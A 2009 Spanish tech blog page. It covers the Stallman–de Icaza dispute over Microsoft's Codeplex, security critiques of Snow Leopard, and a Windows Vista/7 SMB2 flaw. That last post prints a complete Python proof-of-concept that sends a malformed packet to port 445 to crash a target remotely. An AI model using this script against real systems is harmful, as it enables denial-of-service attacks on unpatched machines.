Deacuerdo con los comentarios realizados por Richard Stallman, Miguel de Icaza responde en su blog:
“Quiero decir que Dios ama a todas las critaturas. Desde el formidable elefante hasta la más pequeña hormiga. Y eso incluye a Richard Stallman.
En cuanto a mí, creo que hay un mundo de posibilidades, y si Richard quiere discutir cómo podemos mejorar la mancomunidad del Open Source/Software Libre en el mundo, él tiene mi dirección de correo eletrónico.
Con amor, Miguel”.
Todo en exceso es malo, y ser tan purista como lo es Richard Stallman han llevado a muchos linuxeros y seguidores del software libre a odiarlo, lo que hizo Miguel de Icaza a unirse a las filas de Microsoft, no lo veo como un retroceso o una traición como lo menciona RMS, es cierto que Microsoft es una empresa que sólo piensa en su beneficio y claro, en dinero; sin embargo incluír a Miguel de Icaza en su proyecto codeplex, sería un aporte muy grande al software libre/open sorce , no hay que cegarse y ser purista, no se llegará a nada con esa actitud.
En las celebraciones del Software Freedom Day de este año en la ciudad de Boston (EE.UU.) Richard Stallman respondió algunas muy interesantes preguntas de donde indudablemente se destaca su afirmación de que Miguel de Icaza: “is basically a traitor to the Free Software community” .
A la renuncia de Sam Ramji de la fundación codeplex, se dice que Miguel de Icaza podría tomar el mando de ésta fundación ya que es miembro de ésta organización fundada por Microsoft.
En la conferencia, Stallman llegó a decir que la participación de Miguel de Icaza en el proyecto(codeplex) no da mucha confianza ya que él es un apologista de Microsoft.
Sin duda, éste tema da mucho de que hablar, los comentarios de los linuxeros son muy diversos, unos apoyan a Icazay otros apoyan a Stallman, Icaza ha sido muy criticado por estar cerca de la empresa Microsoft por proyectos como Mono y declaraciones como : “GNOME debe estar basado en .NET”.
Ésta decisión de Icaza de pertenecer a un proyecto de Microsoft puede tener sus puntos a favor y puntos encontra, la fundación codeplex no suena tan mal, se trata de una organización en dónde promueve a empresas y comunidades aportar con sus aplicaciones de manera abierta, ésto sin duda, puede acarrear cosas buenas para la comunidad de Linux, ya que muchos de los proyectos posiblemente pueden correr bien sobre Linux utilizando mono.
La competencia es grande , el software libre y opensorce estan creciendo bastante, por lo que Microsoft inteligentemente se tiene que aliar a éstos conceptos, aunque claro, Microsoft velará por sus intereses.
Segun dailytech.com, algunos expertos en seguridad y reconocidos hackers alertan que el último Sistema Operativo presentado por la manzana blanca, Snow Leopard, es menos seguro que el próximo Sistema Operativo de Microsoft, Windows 7.
Estas afirmaciones se basan en el hecho de que Snow Leopard trae desactivado por defecto el cortafuegos (aunque el usuario lo puede volver a activar), que las actualizaciones no sean totalmente automáticas y que Safari incluye un sistema antiphising muy débil.
A lo anterior se debe agregar el hecho de que Apple incluyó en Snow Leopard una versión de Adobe Flash que era vulnerable a ataques, aunque esto último fue solucionado con la primera actualización del Sistema Operativo.
El reconocido hacker Charlie Miller ha criticado que Snow Leopard no incluya ninguna modificación relacionada con la forma como el sistema asigna la memoria disponible en forma aleatoria, una debilidad que ya era conocida en versiones anteriores de Mac OS y que en este último Sistema Operativo sigue igual. Es por esta razón que es mucho más fácil para los hackers realizar un ataque contra Snow Leopard que contra Windows 7.
Claro que no todo han sido críticas, porque Miller reconoce las mejoras de seguridad introducidas en QuickTime X (el que fue re-escrito completamente) y la efectiva implementación del sistema de prevención de ejecución de datos (DEP), un sistema que protege el uso de la memoria y que se encuentra integrado en Windows 7.
Vulnerabilidad encontrada en el procotolo SMB en windows vista y windows 7, con éste exploit el atacante puede congelar(crash) remotamente cualquiera de éstos 2 sistemas operativos.
Por el momento no la hay, simplemente cerrar puertos del SMB.
#!/usr/bin/python #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> =) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()
Todos los derechos reservados. Tecnologia.
September 25, 2009 | Etiquetado en: 